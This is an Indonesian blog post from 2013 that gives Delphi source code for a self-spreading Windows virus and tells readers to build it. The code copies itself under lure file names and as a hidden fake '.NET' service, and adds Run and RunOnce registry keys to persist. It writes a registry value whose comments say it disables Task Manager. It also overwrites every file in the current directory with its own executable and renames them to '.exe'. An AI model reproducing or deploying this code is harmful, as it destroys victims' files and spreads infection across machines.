Pages

Senin, 21 Januari 2013

VIRUS DELPHI 07

Membuat VIRUS dengan Delphi 07

Virus Ajip...........dengan delphi 07
buka dulu Borland delphi 07
kemudian buat form sesuai dengan procedure coding dibawah ini

unit Unit1;
interface
{Deklarasi ShellApi Yang Digunakan}
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs,Shellapi,registry, Mmsystem, StdCtrls, ExtCtrls, jpeg;
type
TForm1 = class(TForm)
Timer1: TTimer;
Timer2: TTimer;
procedure Timer2Timer(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
{{$R MySoundRes.RES}
procedure TForm1.FormCreate(Sender: TObject);
{Deklarasi variabel}
var
regis: TRegistry;
APath: string;
MySearch: TSearchRec;
dir : string;
{i : integer;}
{x : integer;}
{F:TextFile;}
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
{form tak terlihat}
Application.ShowMainForm := false;
{copy dulu ah}
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
mkdir(sysdir+’\runfold’);
except
end;
try
CopyFile(pchar(application.ExeName),PChar(windir+’\Dadan cakep.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\sistim32.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Rahasia.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Jangan dibuka.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\hotmovie.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\ramdan.avi.exe’),true);
CopyFile(pchar(application.ExeName),PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{menjalankan service tak terlihat}
begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{men-disable TASK MANAGER}
try
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;
regis.OpenKey(’Software’, True);
regis.OpenKey(’Microsoft’, True);
regis.OpenKey(’Windows’, True);
regis.OpenKey(’CurrentVersion’, True);
regis.OpenKey(’Policies’, True);
regis.OpenKey(’System’, True);
regis.WriteString(’DisableTaskMgr’, ‘0′);
regis.CloseKey;
except
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{membuat key di registry biar auto run gitu}
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then
reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg1.CloseKey;
{membuat key registry di runonce}
reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,True) then
reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg2.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{menginfeksi file}
begin
try
dir := GetCurrentDir;
APath:= dir;
FindFirst(APath+’\*.*’, faAnyFile, MySearch);
refresh;
while FindNext(MySearch)=0 do
begin
copyFile (pchar(application.ExeName),pchar(APath+’\’+MySearch.Name),false);
refresh;
end;
FindClose(MySearch);
except
end;
end;
refresh;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{merubah file yg terinfeksi}
begin
try
dir := GetCurrentDir;
APath:= dir;
FindFirst(APath+’\*.*’, faAnyFile, MySearch);
refresh;
while FindNext(MySearch)=0 do
begin
renamefile (pchar(APath+’\’+MySearch.Name),pchar(APath+’\’+MySearch.Name+’.exe’));
renamefile (pchar(application.ExeName+’.exe’),pchar(application.ExeName));
refresh;
end;
FindClose(MySearch);
except
end;
end;
refresh;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
procedure TForm1.Timer1Timer(Sender: TObject);
{terus perhatiin yah}
{deklarasi variabel}
var
regis: TRegistry;
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
mkdir(sysdir+’\runfold’);
except
end;
try
CopyFile(pchar(application.ExeName),PChar(windir+’\Dadan cakep.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\sistim32.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Rahasia.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Jangan dibuka.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\hotmovie.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\ramdan.avi.exe’),true);
CopyFile(pchar(application.ExeName),PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{tetep jalanin virus secara tak terlihat}
begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{mendisable task manager}
begin
try
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;
regis.OpenKey(’Software’, True);
regis.OpenKey(’Microsoft’, True);
regis.OpenKey(’Windows’, True);
regis.OpenKey(’CurrentVersion’, True);
regis.OpenKey(’Policies’, True);
regis.OpenKey(’System’, True);
regis.WriteString(’DisableTaskMgr’, ‘0′);
regis.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then
reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg1.CloseKey;
{bikin lagi key registry}
reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,True) then
reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg2.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
try
ShellExecute(0, ‘open’, ‘www.imm.or.id’, nil, nil, SW_NORMAL);
mciSendString(’dadan cakep deh’, nil, 0, handle);
except
end;
timer2.Enabled:= true;
timer1.Enabled:= false;
end;
procedure TForm1.Timer2Timer(Sender: TObject);
begin
try
mciSendString(’dadan memang cakep’, nil, 0, handle);
except
end;
timer1.Enabled:= true;
timer2.Enabled:= false;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
end;
end.
Diposting oleh di 16.13

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)

Comments

Pengunjung